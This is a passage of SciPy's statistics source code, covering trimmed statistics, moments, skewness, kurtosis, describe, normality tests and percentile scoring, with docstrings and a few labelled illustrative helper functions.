>>> stats.tmax(x)
19
>>> stats.tmax(x, 13)
13
>>> stats.tmax(x, 13, inclusive=False)
12
"""
a, axis = _chk_asarray(a, axis)
am = _mask_to_limits(a, (None, upperlimit), (False, inclusive))
contains_nan, nan_policy = _contains_nan(am, nan_policy)
if contains_nan and nan_policy == 'omit':
am = ma.masked_invalid(am)
res = ma.maximum.reduce(am, axis).data
if res.ndim == 0:
return res[()]
return res
def tstd(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed sample standard deviation.
This function finds the sample standard deviation of given values,
ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tstd : float
Trimmed sample standard deviation.
Notes
-----
`tstd` computes the unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tstd(x)
5.9160797830996161
>>> stats.tstd(x, (3,17))
4.4721359549995796
"""
return np.sqrt(tvar(a, limits, inclusive, axis, ddof))
def tsem(a, limits=None, inclusive=(True, True), axis=0, ddof=1):
"""Compute the trimmed standard error of the mean.
This function finds the standard error of the mean for given
values, ignoring values outside the given `limits`.
Parameters
----------
a : array_like
Array of values.
limits : None or (lower limit, upper limit), optional
Values in the input array less than the lower limit or greater than the
upper limit will be ignored. When limits is None, then all values are
used. Either of the limit values in the tuple can also be None
representing a half-open interval. The default value is None.
inclusive : (bool, bool), optional
A tuple consisting of the (lower flag, upper flag). These flags
determine whether values exactly equal to the lower or upper limits
are included. The default value is (True, True).
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over the
whole array `a`.
ddof : int, optional
Delta degrees of freedom. Default is 1.
Returns
-------
tsem : float
Trimmed standard error of the mean.
Notes
-----
`tsem` uses unbiased sample standard deviation, i.e. it uses a
correction factor ``n / (n - 1)``.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.tsem(x)
1.3228756555322954
>>> stats.tsem(x, (3,17))
1.1547005383792515
"""
a = np.asarray(a).ravel()
if limits is None:
return a.std(ddof=ddof) / np.sqrt(a.size)
am = _mask_to_limits(a, limits, inclusive)
sd = np.sqrt(np.ma.var(am, ddof=ddof, axis=axis))
return sd / np.sqrt(am.count())
#####################################
# MOMENTS #
#####################################
def moment(a, moment=1, axis=0, nan_policy='propagate'):
r"""Calculate the nth moment about the mean for a sample.
A moment is a specific quantitative measure of the shape of a set of
points. It is often used to calculate coefficients of skewness and kurtosis
due to its close relationship with them.
Parameters
----------
a : array_like
Input array.
moment : int or array_like of ints, optional
Order of central moment that is returned. Default is 1.
axis : int or None, optional
Axis along which the central moment is computed. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
n-th central moment : ndarray or float
The appropriate moment along the given axis or over all values if axis
is None. The denominator for the moment calculation is the number of
observations, no degrees of freedom correction is done.
See Also
--------
kurtosis, skew, describe
Notes
-----
The k-th central moment of a data sample is:
.. math::
m_k = \frac{1}{n} \sum_{i = 1}^n (x_i - \bar{x})^k
Where n is the number of samples and x-bar is the mean. This function uses
exponentiation by squares [1]_ for efficiency.
References
----------
.. [1] https://eli.thegreenplace.net/2009/03/21/efficient-integer-exponentiation-algorithms
Examples
--------
>>> from scipy.stats import moment
>>> moment([1, 2, 3, 4, 5], moment=1)
0.0
>>> moment([1, 2, 3, 4, 5], moment=2)
2.0
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.moment(a, moment, axis)
if a.size == 0:
moment_shape = list(a.shape)
del moment_shape[axis]
dtype = a.dtype.type if a.dtype.kind in 'fc' else np.float64
# empty array, return nan(s) with shape matching `moment`
out_shape = (moment_shape if np.isscalar(moment)
else [len(moment)] + moment_shape)
if len(out_shape) == 0:
return dtype(np.nan)
else:
return np.full(out_shape, np.nan, dtype=dtype)
# for array_like moment input, return a value for each.
if not np.isscalar(moment):
mean = a.mean(axis, keepdims=True)
mmnt = [_moment(a, i, axis, mean=mean) for i in moment]
return np.array(mmnt)
else:
return _moment(a, moment, axis)
# Moment with optional pre-computed mean, equal to a.mean(axis, keepdims=True)
def _moment(a, moment, axis, *, mean=None):
if np.abs(moment - np.round(moment)) > 0:
raise ValueError("All moment parameters must be integers")
if moment == 0 or moment == 1:
# By definition the zeroth moment about the mean is 1, and the first
# moment is 0.
shape = list(a.shape)
del shape[axis]
dtype = a.dtype.type if a.dtype.kind in 'fc' else np.float64
if len(shape) == 0:
return dtype(1.0 if moment == 0 else 0.0)
else:
return (np.ones(shape, dtype=dtype) if moment == 0
else np.zeros(shape, dtype=dtype))
else:
# Exponentiation by squares: form exponent sequence
n_list = [moment]
current_n = moment
while current_n > 2:
if current_n % 2:
current_n = (current_n - 1) / 2
else:
current_n /= 2
n_list.append(current_n)
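# Illustrative example: for moment=5 the loop above builds n_list = [5, 2].
# The code below then starts from s = (x - mean)**2, squares it once (4th
# power) and multiplies by (x - mean) once more (5th power) before averaging.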
# Starting point for exponentiation by squares
mean = a.mean(axis, keepdims=True) if mean is None else mean
a_zero_mean = a - mean
if n_list[-1] == 1:
s = a_zero_mean.copy()
else:
s = a_zero_mean**2
# Perform multiplications
for n in n_list[-2::-1]:
s = s**2
if n % 2:
s *= a_zero_mean
return np.mean(s, axis)
@_axis_nan_policy_factory(
lambda x: x, result_unpacker=lambda x: (x,), n_outputs=1
)
def skew(a, axis=0, bias=True, nan_policy='propagate'):
r"""Compute the sample skewness of a data set.
For normally distributed data, the skewness should be about zero. For
unimodal continuous distributions, a skewness value greater than zero means
that there is more weight in the right tail of the distribution. The
function `skewtest` can be used to determine if the skewness value
is close enough to zero, statistically speaking.
Parameters
----------
a : ndarray
Input array.
axis : int or None, optional
Axis along which skewness is calculated. Default is 0.
If None, compute over the whole array `a`.
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
skewness : ndarray
The skewness of values along an axis, returning 0 where all values are
equal.
Notes
-----
The sample skewness is computed as the Fisher-Pearson coefficient
of skewness, i.e.
.. math::
g_1=\frac{m_3}{m_2^{3/2}}
where
.. math::
m_i=\frac{1}{N}\sum_{n=1}^N(x[n]-\bar{x})^i
is the biased sample :math:`i\texttt{th}` central moment, and
:math:`\bar{x}` is
the sample mean. If ``bias`` is False, the calculations are
corrected for bias and the value computed is the adjusted
Fisher-Pearson standardized moment coefficient, i.e.
.. math::
G_1=\frac{k_3}{k_2^{3/2}}=
\frac{\sqrt{N(N-1)}}{N-2}\frac{m_3}{m_2^{3/2}}.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Section 2.2.24.1
Examples
--------
>>> from scipy.stats import skew
>>> skew([1, 2, 3, 4, 5])
0.0
>>> skew([2, 8, 0, 4, 1, 9, 9, 0])
0.2650554122698573
"""
a, axis = _chk_asarray(a, axis)
n = a.shape[axis]
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skew(a, axis, bias)
mean = a.mean(axis, keepdims=True)
m2 = _moment(a, 2, axis, mean=mean)
m3 = _moment(a, 3, axis, mean=mean)
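# Where the variance m2 is at floating-point noise level relative to the mean,
# treat the sample as constant and report a skewness of 0 instead of dividing
# by (nearly) zero.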
with np.errstate(all='ignore'):
zero = (m2 <= (np.finfo(m2.dtype).resolution * mean.squeeze(axis))**2)
vals = np.where(zero, 0, m3 / m2**1.5)
if not bias:
can_correct = ~zero & (n > 2)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m3 = np.extract(can_correct, m3)
nval = np.sqrt((n - 1.0) * n) / (n - 2.0) * m3 / m2**1.5
np.place(vals, can_correct, nval)
if vals.ndim == 0:
return vals.item()
return vals
@_axis_nan_policy_factory(
lambda x: x, result_unpacker=lambda x: (x,), n_outputs=1
)
def kurtosis(a, axis=0, fisher=True, bias=True, nan_policy='propagate'):
"""Compute the kurtosis (Fisher or Pearson) of a dataset.
Kurtosis is the fourth central moment divided by the square of the
variance. If Fisher's definition is used, then 3.0 is subtracted from
the result to give 0.0 for a normal distribution.
If bias is False then the kurtosis is calculated using k statistics to
eliminate bias coming from biased moment estimators
Use `kurtosistest` to see if result is close enough to normal.
Parameters
----------
a : array
Data for which the kurtosis is calculated.
axis : int or None, optional
Axis along which the kurtosis is calculated. Default is 0.
If None, compute over the whole array `a`.
fisher : bool, optional
If True, Fisher's definition is used (normal ==> 0.0). If False,
Pearson's definition is used (normal ==> 3.0).
bias : bool, optional
If False, then the calculations are corrected for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
kurtosis : array
The kurtosis of values along an axis. If all values are equal,
return -3 for Fisher's definition and 0 for Pearson's definition.
References
----------
.. [1] Zwillinger, D. and Kokoska, S. (2000). CRC Standard
Probability and Statistics Tables and Formulae. Chapman & Hall: New
York. 2000.
Examples
--------
In Fisher's definition, the kurtosis of the normal distribution is zero.
In the following example, the kurtosis is close to zero, because it was
calculated from the dataset, not from the continuous distribution.
>>> from scipy.stats import norm, kurtosis
>>> data = norm.rvs(size=1000, random_state=3)
>>> kurtosis(data)
-0.06928694200380558
The distribution with a higher kurtosis has a heavier tail.
The zero valued kurtosis of the normal distribution in Fisher's definition
can serve as a reference point.
>>> import matplotlib.pyplot as plt
>>> import scipy.stats as stats
>>> from scipy.stats import kurtosis
>>> x = np.linspace(-5, 5, 100)
>>> ax = plt.subplot()
>>> distnames = ['laplace', 'norm', 'uniform']
>>> for distname in distnames:
... if distname == 'uniform':
... dist = getattr(stats, distname)(loc=-2, scale=4)
... else:
... dist = getattr(stats, distname)
... data = dist.rvs(size=1000)
... kur = kurtosis(data, fisher=True)
... y = dist.pdf(x)
... ax.plot(x, y, label="{}, {}".format(distname, round(kur, 3)))
... ax.legend()
The Laplace distribution has a heavier tail than the normal distribution.
The uniform distribution (which has negative kurtosis) has the thinnest
tail.
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosis(a, axis, fisher, bias)
n = a.shape[axis]
mean = a.mean(axis, keepdims=True)
m2 = _moment(a, 2, axis, mean=mean)
m4 = _moment(a, 4, axis, mean=mean)
with np.errstate(all='ignore'):
zero = (m2 <= (np.finfo(m2.dtype).resolution * mean.squeeze(axis))**2)
vals = np.where(zero, 0, m4 / m2**2.0)
if not bias:
can_correct = ~zero & (n > 3)
if can_correct.any():
m2 = np.extract(can_correct, m2)
m4 = np.extract(can_correct, m4)
nval = 1.0/(n-2)/(n-3) * ((n**2-1.0)*m4/m2**2.0 - 3*(n-1)**2.0)
np.place(vals, can_correct, nval + 3.0)
if vals.ndim == 0:
vals = vals.item() # array scalar
return vals - 3 if fisher else vals
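# Hedged illustration (hypothetical helper, not part of SciPy): Fisher's and
# Pearson's definitions differ only by the constant 3 subtracted on the last
# line of `kurtosis` above, so the two results always differ by exactly 3.
def _demo_kurtosis_definitions(sample=(1.0, 2.0, 3.0, 4.0, 5.0)):
    x = np.asarray(sample)
    fisher = kurtosis(x, fisher=True)    # normal distribution -> 0.0
    pearson = kurtosis(x, fisher=False)  # normal distribution -> 3.0
    return fisher, pearson               # fisher == pearson - 3.0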
DescribeResult = namedtuple('DescribeResult',
('nobs', 'minmax', 'mean', 'variance', 'skewness',
'kurtosis'))
def describe(a, axis=0, ddof=1, bias=True, nan_policy='propagate'):
"""Compute several descriptive statistics of the passed array.
Parameters
----------
a : array_like
Input data.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
ddof : int, optional
Delta degrees of freedom (only for variance). Default is 1.
bias : bool, optional
If False, then the skewness and kurtosis calculations are corrected
for statistical bias.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
nobs : int or ndarray of ints
Number of observations (length of data along `axis`).
When 'omit' is chosen as nan_policy, the length along each axis
slice is counted separately.
minmax: tuple of ndarrays or floats
Minimum and maximum value of `a` along the given axis.
mean : ndarray or float
Arithmetic mean of `a` along the given axis.
variance : ndarray or float
Unbiased variance of `a` along the given axis; denominator is number
of observations minus one.
skewness : ndarray or float
Skewness of `a` along the given axis, based on moment calculations
with denominator equal to the number of observations, i.e. no degrees
of freedom correction.
kurtosis : ndarray or float
Kurtosis (Fisher) of `a` along the given axis. The kurtosis is
normalized so that it is zero for the normal distribution. No
degrees of freedom are used.
See Also
--------
skew, kurtosis
Examples
--------
>>> from scipy import stats
>>> a = np.arange(10)
>>> stats.describe(a)
DescribeResult(nobs=10, minmax=(0, 9), mean=4.5,
variance=9.166666666666666, skewness=0.0,
kurtosis=-1.2242424242424244)
>>> b = [[1, 2], [3, 4]]
>>> stats.describe(b)
DescribeResult(nobs=2, minmax=(array([1, 2]), array([3, 4])),
mean=array([2., 3.]), variance=array([2., 2.]),
skewness=array([0., 0.]), kurtosis=array([-2., -2.]))
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.describe(a, axis, ddof, bias)
if a.size == 0:
raise ValueError("The input must not be empty.")
n = a.shape[axis]
mm = (np.min(a, axis=axis), np.max(a, axis=axis))
m = np.mean(a, axis=axis)
v = np.var(a, axis=axis, ddof=ddof)
sk = skew(a, axis, bias=bias)
kurt = kurtosis(a, axis, bias=bias)
return DescribeResult(n, mm, m, v, sk, kurt)
#####################################
# NORMALITY TESTS #
#####################################
def _normtest_finish(z, alternative):
"""Common code between all the normality-test functions."""
if alternative == 'less':
prob = distributions.norm.cdf(z)
elif alternative == 'greater':
prob = distributions.norm.sf(z)
elif alternative == 'two-sided':
prob = 2 * distributions.norm.sf(np.abs(z))
else:
raise ValueError("alternative must be "
"'less', 'greater' or 'two-sided'")
if z.ndim == 0:
z = z[()]
return z, prob
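# Hedged illustration (hypothetical helper, not part of SciPy): for a single z
# value, the three alternatives handled by `_normtest_finish` satisfy
# p_less + p_greater == 1 and p_two == 2 * min(p_less, p_greater).
def _demo_normtest_finish_alternatives(z=1.5):
    z = np.asarray(z, dtype=float)
    _, p_less = _normtest_finish(z, 'less')
    _, p_greater = _normtest_finish(z, 'greater')
    _, p_two = _normtest_finish(z, 'two-sided')
    return p_less, p_greater, p_two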
SkewtestResult = namedtuple('SkewtestResult', ('statistic', 'pvalue'))
def skewtest(a, axis=0, nan_policy='propagate', alternative='two-sided'):
"""Test whether the skew is different from the normal distribution.
This function tests the null hypothesis that the skewness of
the population that the sample was drawn from is the same
as that of a corresponding normal distribution.
Parameters
----------
a : array
The data to be tested.
axis : int or None, optional
Axis along which statistics are calculated. Default is 0.
If None, compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis. Default is 'two-sided'.
The following options are available:
* 'two-sided': the skewness of the distribution underlying the sample
is different from that of the normal distribution (i.e. 0)
* 'less': the skewness of the distribution underlying the sample
is less than that of the normal distribution
* 'greater': the skewness of the distribution underlying the sample
is greater than that of the normal distribution
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The p-value for the hypothesis test.
Notes
-----
The sample size must be at least 8.
References
----------
.. [1] R. B. D'Agostino, A. J. Belanger and R. B. D'Agostino Jr.,
"A suggestion for using powerful and informative tests of
normality", American Statistician 44, pp. 316-321, 1990.
Examples
--------
>>> from scipy.stats import skewtest
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8])
SkewtestResult(statistic=1.0108048609177787, pvalue=0.3121098361421897)
>>> skewtest([2, 8, 0, 4, 1, 9, 9, 0])
SkewtestResult(statistic=0.44626385374196975, pvalue=0.6554066631275459)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8000])
SkewtestResult(statistic=3.571773510360407, pvalue=0.0003545719905823133)
>>> skewtest([100, 100, 100, 100, 100, 100, 100, 101])
SkewtestResult(statistic=3.5717766638478072, pvalue=0.000354567720281634)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8], alternative='less')
SkewtestResult(statistic=1.0108048609177787, pvalue=0.8439450819289052)
>>> skewtest([1, 2, 3, 4, 5, 6, 7, 8], alternative='greater')
SkewtestResult(statistic=1.0108048609177787, pvalue=0.15605491807109484)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.skewtest(a, axis, alternative)
if axis is None:
a = np.ravel(a)
axis = 0
b2 = skew(a, axis)
n = a.shape[axis]
if n < 8:
raise ValueError(
"skewtest is not valid with less than 8 samples; %i samples"
" were given." % int(n))
y = b2 * math.sqrt(((n + 1) * (n + 3)) / (6.0 * (n - 2)))
beta2 = (3.0 * (n**2 + 27*n - 70) * (n+1) * (n+3) /
((n-2.0) * (n+5) * (n+7) * (n+9)))
W2 = -1 + math.sqrt(2 * (beta2 - 1))
delta = 1 / math.sqrt(0.5 * math.log(W2))
alpha = math.sqrt(2.0 / (W2 - 1))
y = np.where(y == 0, 1, y)
Z = delta * np.log(y / alpha + np.sqrt((y / alpha)**2 + 1))
return SkewtestResult(*_normtest_finish(Z, alternative))
KurtosistestResult = namedtuple('KurtosistestResult', ('statistic', 'pvalue'))
def kurtosistest(a, axis=0, nan_policy='propagate', alternative='two-sided'):
"""Test whether a dataset has normal kurtosis.
This function tests the null hypothesis that the kurtosis
of the population from which the sample was drawn is that
of the normal distribution.
Parameters
----------
a : array
Array of the sample data.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided': the kurtosis of the distribution underlying the sample
is different from that of the normal distribution
* 'less': the kurtosis of the distribution underlying the sample
is less than that of the normal distribution
* 'greater': the kurtosis of the distribution underlying the sample
is greater than that of the normal distribution
.. versionadded:: 1.7.0
Returns
-------
statistic : float
The computed z-score for this test.
pvalue : float
The p-value for the hypothesis test.
Notes
-----
Valid only for n>20. This function uses the method described in [1]_.
References
----------
.. [1] see e.g. F. J. Anscombe, W. J. Glynn, "Distribution of the kurtosis
statistic b2 for normal samples", Biometrika, vol. 70, pp. 227-234, 1983.
Examples
--------
>>> from scipy.stats import kurtosistest
>>> kurtosistest(list(range(20)))
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.08804338332528348)
>>> kurtosistest(list(range(20)), alternative='less')
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.04402169166264174)
>>> kurtosistest(list(range(20)), alternative='greater')
KurtosistestResult(statistic=-1.7058104152122062, pvalue=0.9559783083373583)
>>> rng = np.random.default_rng()
>>> s = rng.normal(0, 1, 1000)
>>> kurtosistest(s)
KurtosistestResult(statistic=-1.475047944490622, pvalue=0.14019965402996987)
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.kurtosistest(a, axis, alternative)
n = a.shape[axis]
if n < 5:
raise ValueError(
"kurtosistest requires at least 5 observations; %i observations"
" were given." % int(n))
if n < 20:
warnings.warn("kurtosistest only valid for n>=20 ... continuing "
"anyway, n=%i" % int(n))
b2 = kurtosis(a, axis, fisher=False)
E = 3.0*(n-1) / (n+1)
varb2 = 24.0*n*(n-2)*(n-3) / ((n+1)*(n+1.)*(n+3)*(n+5)) # [1]_ Eq. 1
x = (b2-E) / np.sqrt(varb2) # [1]_ Eq. 4
# [1]_ Eq. 2:
sqrtbeta1 = 6.0*(n*n-5*n+2)/((n+7)*(n+9)) * np.sqrt((6.0*(n+3)*(n+5)) /
(n*(n-2)*(n-3)))
# [1]_ Eq. 3:
A = 6.0 + 8.0/sqrtbeta1 * (2.0/sqrtbeta1 + np.sqrt(1+4.0/(sqrtbeta1**2)))
term1 = 1 - 2/(9.0*A)
denom = 1 + x*np.sqrt(2/(A-4.0))
term2 = np.sign(denom) * np.where(denom == 0.0, np.nan,
np.power((1-2.0/A)/np.abs(denom), 1/3.0))
if np.any(denom == 0):
msg = "Test statistic not defined in some cases due to division by " \
"zero. Return nan in that case..."
warnings.warn(msg, RuntimeWarning)
Z = (term1 - term2) / np.sqrt(2/(9.0*A)) # [1]_ Eq. 5
# zprob uses upper tail, so Z needs to be positive
return KurtosistestResult(*_normtest_finish(Z, alternative))
NormaltestResult = namedtuple('NormaltestResult', ('statistic', 'pvalue'))
def normaltest(a, axis=0, nan_policy='propagate'):
"""Test whether a sample differs from a normal distribution.
This function tests the null hypothesis that a sample comes
from a normal distribution. It is based on D'Agostino and
Pearson's [1]_, [2]_ test that combines skew and kurtosis to
produce an omnibus test of normality.
Parameters
----------
a : array_like
The array containing the sample to be tested.
axis : int or None, optional
Axis along which to compute test. Default is 0. If None,
compute over the whole array `a`.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float or array
``s^2 + k^2``, where ``s`` is the z-score returned by `skewtest` and
``k`` is the z-score returned by `kurtosistest`.
pvalue : float or array
A 2-sided chi squared probability for the hypothesis test.
References
----------
.. [1] D'Agostino, R. B. (1971), "An omnibus test of normality for
moderate and large sample size", Biometrika, 58, 341-348
.. [2] D'Agostino, R. and Pearson, E. S. (1973), "Tests for departure from
normality", Biometrika, 60, 613-622
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> pts = 1000
>>> a = rng.normal(0, 1, size=pts)
>>> b = rng.normal(2, 1, size=pts)
>>> x = np.concatenate((a, b))
>>> k2, p = stats.normaltest(x)
>>> alpha = 1e-3
>>> print("p = {:g}".format(p))
p = 8.4713e-19
>>> if p < alpha: # null hypothesis: x comes from a normal distribution
... print("The null hypothesis can be rejected")
... else:
... print("The null hypothesis cannot be rejected")
The null hypothesis can be rejected
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.normaltest(a, axis)
s, _ = skewtest(a, axis)
k, _ = kurtosistest(a, axis)
k2 = s*s + k*k
return NormaltestResult(k2, distributions.chi2.sf(k2, 2))
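# Hedged illustration (hypothetical helper, not part of SciPy): the statistic
# of `normaltest` is simply the sum of squares of the z-scores returned by
# `skewtest` and `kurtosistest`, as computed in the last lines above.
def _demo_normaltest_decomposition(x=tuple(range(30))):
    x = np.asarray(x, dtype=float)
    s, _ = skewtest(x)
    k, _ = kurtosistest(x)
    return s * s + k * k, normaltest(x).statistic   # the two values should agree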
Jarque_beraResult = namedtuple('Jarque_beraResult', ('statistic', 'pvalue'))
def jarque_bera(x):
"""Perform the Jarque-Bera goodness of fit test on sample data.
The Jarque-Bera test tests whether the sample data has the skewness and
kurtosis matching a normal distribution.
Note that this test only works for a large enough number of data samples
(>2000) as the test statistic asymptotically has a Chi-squared distribution
with 2 degrees of freedom.
Parameters
----------
x : array_like
Observations of a random variable.
Returns
-------
jb_value : float
The test statistic.
p : float
The p-value for the hypothesis test.
References
----------
.. [1] Jarque, C. and Bera, A. (1980) "Efficient tests for normality,
homoscedasticity and serial independence of regression residuals",
Economics Letters, 6, pp. 255-259.
Examples
--------
>>> from scipy import stats
>>> rng = np.random.default_rng()
>>> x = rng.normal(0, 1, 100000)
>>> jarque_bera_test = stats.jarque_bera(x)
>>> jarque_bera_test
Jarque_beraResult(statistic=3.3415184718131554, pvalue=0.18810419594996775)
>>> jarque_bera_test.statistic
3.3415184718131554
>>> jarque_bera_test.pvalue
0.18810419594996775
"""
x = np.asarray(x)
n = x.size
if n == 0:
raise ValueError('At least one observation is required.')
mu = x.mean()
diffx = x - mu
skewness = (1 / n * np.sum(diffx**3)) / (1 / n * np.sum(diffx**2))**(3 / 2.)
kurtosis = (1 / n * np.sum(diffx**4)) / (1 / n * np.sum(diffx**2))**2
jb_value = n / 6 * (skewness**2 + (kurtosis - 3)**2 / 4)
p = 1 - distributions.chi2.cdf(jb_value, 2)
return Jarque_beraResult(jb_value, p)
#####################################
# FREQUENCY FUNCTIONS #
#####################################
# deindent to work around numpy/gh-16202
@np.deprecate(
message="`itemfreq` is deprecated and will be removed in a "
"future version. Use instead `np.unique(..., return_counts=True)`")
def itemfreq(a):
"""
Return a 2-D array of item frequencies.
Parameters
----------
a : (N,) array_like
Input array.
Returns
-------
itemfreq : (K, 2) ndarray
A 2-D frequency table. Column 1 contains sorted, unique values from
`a`, column 2 contains their respective counts.
Examples
--------
>>> from scipy import stats
>>> a = np.array([1, 1, 5, 0, 1, 2, 2, 0, 1, 4])
>>> stats.itemfreq(a)
array([[ 0., 2.],
[ 1., 4.],
[ 2., 2.],
[ 4., 1.],
[ 5., 1.]])
>>> np.bincount(a)
array([2, 4, 2, 0, 1, 1])
>>> stats.itemfreq(a/10.)
array([[ 0. , 2. ],
[ 0.1, 4. ],
[ 0.2, 2. ],
[ 0.4, 1. ],
[ 0.5, 1. ]])
"""
items, inv = np.unique(a, return_inverse=True)
freq = np.bincount(inv)
return np.array([items, freq]).T
def scoreatpercentile(a, per, limit=(), interpolation_method='fraction',
axis=None):
"""Calculate the score at a given percentile of the input sequence.
For example, the score at `per=50` is the median. If the desired quantile
lies between two data points, we interpolate between them, according to
the value of `interpolation`. If the parameter `limit` is provided, it
should be a tuple (lower, upper) of two values.
Parameters
----------
a : array_like
A 1-D array of values from which to extract score.
per : array_like
Percentile(s) at which to extract score. Values should be in range
[0,100].
limit : tuple, optional
Tuple of two scalars, the lower and upper limits within which to
compute the percentile. Values of `a` outside
this (closed) interval will be ignored.
interpolation_method : {'fraction', 'lower', 'higher'}, optional
Specifies the interpolation method to use,
when the desired quantile lies between two data points `i` and `j`.
The following options are available (default is 'fraction'):
* 'fraction': ``i + (j - i) * fraction`` where ``fraction`` is the
fractional part of the index surrounded by ``i`` and ``j``
* 'lower': ``i``
* 'higher': ``j``
axis : int, optional
Axis along which the percentiles are computed. Default is None. If
None, compute over the whole array `a`.
Returns
-------
score : float or ndarray
Score at percentile(s).
See Also
--------
percentileofscore, numpy.percentile
Notes
-----
This function will become obsolete in the future.
For NumPy 1.9 and higher, `numpy.percentile` provides all the functionality
that `scoreatpercentile` provides, and it is significantly faster.
Therefore, users with numpy >= 1.9 are recommended to use `numpy.percentile`.
Examples
--------
>>> from scipy import stats
>>> a = np.arange(100)
>>> stats.scoreatpercentile(a, 50)
49.5
"""
# adapted from NumPy's percentile function. When we require numpy >= 1.8,
# the implementation of this function can be replaced by np.percentile.
a = np.asarray(a)
if a.size == 0:
# empty array, return nan(s) with shape matching `per`
if np.isscalar(per):
return np.nan
else:
return np.full(np.asarray(per).shape, np.nan, dtype=np.float64)
if limit:
a = a[(limit[0] <= a) & (a <= limit[1])]
sorted_ = np.sort(a, axis=axis)
if axis is None:
axis = 0
return _compute_qth_percentile(sorted_, per, interpolation_method, axis)
# handle sequence of per's without calling sort multiple times
def _compute_qth_percentile(sorted_, per, interpolation_method, axis):
if not np.isscalar(per):
score = [_compute_qth_percentile(sorted_, i,
interpolation_method, axis)
for i in per]
return np.array(score)
if not (0 <= per <= 100):
raise ValueError("percentile must be in the range [0, 100]")
indexer = [slice(None)] * sorted_.ndim
idx = per / 100. * (sorted_.shape[axis] - 1)
if int(idx) != idx:
# round fractional indices according to interpolation method
if interpolation_method == 'lower':
idx = int(np.floor(idx))
elif interpolation_method == 'higher':
idx = int(np.ceil(idx))
elif interpolation_method == 'fraction':
pass # keep idx as fraction and interpolate
else:
raise ValueError("interpolation_method can only be 'fraction', "
"'lower' or 'higher'")
i = int(idx)
if i == idx:
indexer[axis] = slice(i, i + 1)
weights = array(1)
sumval = 1.0
else:
indexer[axis] = slice(i, i + 2)
j = i + 1
weights = array([(j - idx), (idx - i)], float)
wshape = [1] * sorted_.ndim
wshape[axis] = 2
weights.shape = wshape
sumval = weights.sum()
